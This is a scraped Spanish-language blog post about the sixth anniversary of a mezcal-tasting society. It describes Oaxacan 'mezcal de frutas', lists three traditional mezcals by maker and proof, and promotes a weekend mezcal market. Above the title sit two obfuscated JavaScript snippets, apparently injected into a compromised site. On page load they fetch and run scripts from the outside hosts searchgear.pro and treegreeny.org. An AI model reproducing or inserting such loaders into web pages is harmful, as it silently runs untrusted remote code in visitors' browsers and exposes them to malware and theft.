;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 106. La Logia pasa a secundaria

106. La Logia pasa a secundaria


Ayer, 16 de diciembre, festejamos los primeros 6 años de existencia de la Logia de los Mezcólatras –ya tenemos pase a secundaria-, dedicados concienzudamente a saborear mezcales tradicionales (MT) y a difundir la riquísima tradición mezcalera de México.
Conforme a ésta última, en el distrito de Ejutla, Oaxaca, es costumbre que en festejos especiales se consuma “mezcal de frutas”, llamado así porque antes de llevarse a cabo la última destilación (sea una o dos, dependiendo del tipo de destilador) se agrega a la olla del alambique un puré de frutas criollas muy maduras, seleccionadas al gusto del maestro mezcalillero o de la persona que encarga el mezcal. Hecho lo anterior, se cierra el alambique y se da inicio a la destilación, cuyo resultado es un mezcal trasparente con sutil dejo a frutas.
En el festejo mezcólatra incluimos:
1) “Mezcal de frutas” elaborado en julio de 2004 por Faustino García (a quien cariñosamente llamamos Tino) en El Sauz, Ejutla, Oaxaca, en el que empleó los siguientes magueyes de cultivo: Espadín (8 a 11 años), Chino (8 a 10), Mexicano o Chontal (10 a 13) y Mexicano penca larga (10 a 13). Como en esta población se usan alambiques de cobre con platillos, sólo se realizó una destilación pero, antes de destilar, se agregó a la olla un puré de manzana criolla, manzana fina, plátano dominico, plátano de castilla, plátano guineo, plátano tabasco y piña criolla. Tenía 54°.
2) Mezcal de maguey Cenizo silvestre (8 a 10 años) elaborado en Nombre de Dios, Durango, por Gilberto Roldán (Gilillo) en noviembre de 2011 a 52.4°.
3) Mezcal de puntas de magueyes Espadín (8 a 11), San Martinero (13) y Tobalá (10), elaborado por Gonzalo Hernández en La Compañía, Ejutla, Oaxaca, en septiembre 2008 a 61.1°.
Y para quien sí se aprecie a sí mismo y a la extraordinaria tradición mezcalera de México, le sugerimos que adquiera MT en el Tianguis Mezcólatra los sábados 17 y 24 de diciembre, de 14 a 17 horas, en SINESTESIA: San Luis Potosí 121, altos, esq. Jalapa, colonia Roma, DF.

http://impreso.milenio.com/node/9080937

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *